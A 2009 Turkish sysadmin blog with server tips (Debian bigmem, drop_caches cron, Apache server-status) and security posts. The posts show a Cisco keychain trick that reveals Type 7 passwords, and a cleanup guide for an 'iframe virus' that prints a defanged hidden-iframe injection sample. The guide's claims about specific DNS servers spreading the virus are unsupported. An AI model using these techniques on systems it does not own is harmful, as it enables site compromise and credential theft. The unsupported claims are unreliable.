Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

15 Eylül 2009 Salı

Debian Sunucuda 64 GB. 'a KAdar RAM Tanıtma!

Son zamanlarda çalışan sunucuların çoğu 3 GB. üzerinde RAM kullanmaktadır. Bunun sonucunda 32 bit işletim sistemi kurulumlarında RAM kullanamama sorunu ortaya çıkmaktadır. Bu sorunu çözebilmek için Debian sunucularda apt-get install linux-image-2.6-686-bigmem komutunu girmeniz yeterli. Bu işlem sonucunda sunucunuzun RAM desteği 64 Gb.'a kadar çıkartılabilecektir.

Ayrıca cache RAM temizlemek için girilmesi gereken komutlar:

# sync
# echo 3 > /proc/sys/vm/drop_caches
Eğer crona yazıp her 10 dakika da bir çalıştırmasını istiyorsanız :

# crontab -e
*/10 * * * * /bin/sync
*/10 * * * * /bin/echo 3 > /proc/sys/vm/drop_caches
satırlarını crontaba eklemeniz yeterli olur.

Apache Server Status


Apache kullanıyorsanız ve bazen sunucunun durumu hakkında bilgiye ihtiyaç duyuyorsanız aşağıda bahsedeceğim yolu izleyerek bunu yapabilirsiniz.

Öncelikle anlatılanlar apache2 içindir.

Sunucuya SSH ile bağlandığınızda ;
cd /etc/apache2/sites-enabled/
nano 000-default
komutlarını giriniz. Daha sonra karşınıza çıkan içeriğin en altına tanımının üstüne şu satırları ekleyiniz:

SetHandler server-status
Allow from 155.223.22.22
Deny from All


Bütün bu işlemler bittikten sonra
/etc/init.d/apache2 restart komutunu işleterek web sunucunun restart edilmesini sağlıyoruz. Son olarak durumu izleyeceğimiz yöntem:
Bir web browser'ında http://sunucunuzunadresi.net/durumgoster?refresh=2 adresini yazarak bilgileri izleyebilirsiniz.

refresh=2 değeri kaç saniyede bir durum bilgilerinin yenileneceğini gösterir.

Veya daha detaylı bilgi almak isterseniz Debian dağıtımlarda otomatik kurulumu mümkün olan bir php scripti bulunur.

apt-get install phpsysinfo komutunu işleterek sisteminize kurun ve daha sonra
http://sunucunuzun adresi/phpsysinfo adresine girip sisteminiz hakkında detaylı bilgi sahibi olun.

7 Eylül 2009 Pazartesi

Bir araç kullanmadan Cisco type 7 şifresini görmek


Cisco tech newsletter daki ipuçlarından birine göre "keychain" konfigürasyonundaki bir Cisco router'da Type 7 şifreleri görmek (kırmak) mümkün:

Router (config) #key chain LIGHT
Router (config-keychain) #key 718
Router (config-keychain-key) #key-string 7 11192616193C233850012E3D2B2725711D
Router (config-keychain-key) #do show key chain LIGHT Key-chain decrypt:

key 1 -- text "decrypted_password"

accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]

Güzel bir ipucu ama yine de daha önce bu blogda yazmış olduğumuz kazmier.com daki aracı kullanmak daha hızlı ve kolay:

http://www.kazmier.com/computer/cisco-apps.html

3 Eylül 2009 Perşembe

IFrame Virüsü Hakkında Bilgilendirme...


En son olarak izmirpolis sitesinin başına gelen olaya sebep olan şey bir virüsten ibarettir. Bu virüsün adı iframe virüsüdür. Kısaca virüsün çalışma şeklini ve nasıl temizleme yapılacağını anlatmaya çalışacağım. Bu iş için öncelikle bir adet programcığa ihtiyacınız var. Google'da Advanced Find and Replace yazarak aratıp edinebilirsiniz bu programcığı.

Bu virüsün yayılıp zarar vermesine sebep olan 3 yol vardır:

1- Null script kullanımı
2- Null program kullanımı
3- Justin TV ve Youtube izleme için kullanılan Dns'ler başı çekiyor.

Aşağıda vereceğim iki Dns özellikle bu virüsün yayılmasında en etkili dnslerdir.
212.58.3.2
212.58.4.2

Yukarıda verdiğim DNS'leri kullanmanız durumda oluşacak zarar şu şekilde gözlemlenir:
1- Virüs önce sisteminizi ele geçirir.
2- Kayıtlı FTP programındaki site şifreleri ile sisteminize giriş için anahtarı eline alır.
3- Tasarımı yapılan site dosyalarının içeriğini değiştirir.

Hangi dosyaların içerikleri nasıl değiştirilir?

index.php (asp)
main.php (asp)
header.php (asp)
Footer.php (asp)
index.html (htp)
admin.php (asp)

İçeriklerine IFrame ekleyerek google'ın sitenizi zararlı site kategorisine sokmasını sağlar.

Nasıl temizleriz?

1- Öncelikle FTP sitelerinizin şifrelerini değiştirmeniz gerekmektedir. Bu şifreleri hiçbir programın kaydetmediğinden emin olmalısınız.
2- Kendi bilgisayarımıza adam gibi bir antivirüs kuruyoruz. Tercihen Kaspersky Antivirüs ile sisteminizi taratınız. Muhtemelen 10'dan az olmayacak sayıda solucan ve türevleri bu virüs sayesinde sisteminize sızmıştır. Bunların temizlendiğinden kesin emin olun.
3- Bilgisayarınızın masaüstüne bir klasör oluşturun ve ftp sitenizin içeriğini bu klasöre kopyalayın.
4- Yukarıda daha önce belirttiğim programcığı (Advanced Find and Replace) çalıştırın ve browse yazan yere masaüstünde bulunan web içeriğinizin olduğu dizini gösterin.
5- Search Query kısmına 'iframe' yazıp Execute butonuna tıklayın. IFrame içeriklerini dikkatlice kontrol edip zararlı istekleri temizledikten sonra FTP sitenize tekrar yüklemeniz gerekmektedir.
6- FTP programı ile yüklemenizi yaptıktan sonra virüsün zarar verebileceği dosyalarınızın izinlerini chmod 444 olarak değiştirin. Son olarak FTP şifrenizi değiştirmenizde fayda var.
7- Son aşama ise sitenizin güvenilir olduğunu Google amcaya belirtme kısmıdır. Bu iş için http://www.google.com.tr/webmastertools adresini ziyaret edip sitenizin temiz olduğunu Google amcaya blirtmelisiniz. Takip eden 2 hafta içerisinde muhtemelen siteniz eski sağlığına kavuşacaktır :)
Örnek zararlı kod:

< i_ f r a m e src='http://x.x.x.x/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>

Dipnot: Yukarıdaki kodda iframe kelimesini ve ip adresini değiştirmek zorunda kaldım.
Bu sorunu engellemenin en kısa yolu windows kullanmayı bırakmaktır :)

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites